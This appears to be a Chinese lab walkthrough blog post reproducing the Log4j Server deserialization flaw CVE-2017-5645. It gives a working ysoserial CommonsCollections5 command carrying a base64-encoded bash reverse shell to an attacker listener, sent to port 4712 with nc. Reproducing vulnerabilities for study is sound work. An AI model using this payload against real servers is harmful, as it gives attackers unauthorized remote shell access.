Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

Yeah_0day2024-05-24 11:15

漏洞复现环境搭建请参考

http://t.csdnimg.cn/MxmId

漏洞版本

Apache Log4j 2.8.2之前的2.x版本

漏洞验证

(1)开放端口4712

漏洞利用

(1)ysoserial工具获取

python 复制代码 
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

(2)base64加密反弹shell命令

(3)攻击机开启监听

(4)执行命令获取反弹shell

python 复制代码 
#执行错误原因是因为Kali的jdk版本与ysoserial版本不符,正常执行完该条语句即可反弹shell
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|{bash,-i}" | nc 192.168.88.128 4712
相关推荐
xlp666hub6 分钟前
如果操作GPIO可能导致休眠,那么同步机制绝不能采用spinlock
linux·面试
RisunJan26 分钟前
Linux命令-mkbootdisk(可建立目前系统的启动盘)
linux·运维·服务器
我叫果冻1 小时前
ai-assist:基于 LangChain4j 的 RAG 智能助手,本地化部署更安全
人工智能·安全
朽棘不雕1 小时前
Linux工具(上)
linux·运维·服务器
努力的lpp1 小时前
2024小迪安全课程第四节复习笔记
笔记·安全
BestOrNothing_20152 小时前
Ubuntu 22.04 下调整 VS Code 界面及字体教程
linux·vscode·ubuntu22.04·界面调整
桌面运维家2 小时前
Windows/Linux云桌面:高校VDisk方案部署指南
linux·运维·windows
菜根Sec2 小时前
网络安全冬天怎么过
安全·web安全·网络安全·网络安全公司
mzhan0172 小时前
Linux:intel:Cache Allocation tech
linux·cpu
学机械的鱼鱼3 小时前
【踩坑记录】Linux环境下FreeCAD打开后一新建就崩
linux
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06OpenClaw 使用和管理 MCP 完全指南07AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南08UV安装并设置国内源09OpenClaw Control UI安全上下文访问配置10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)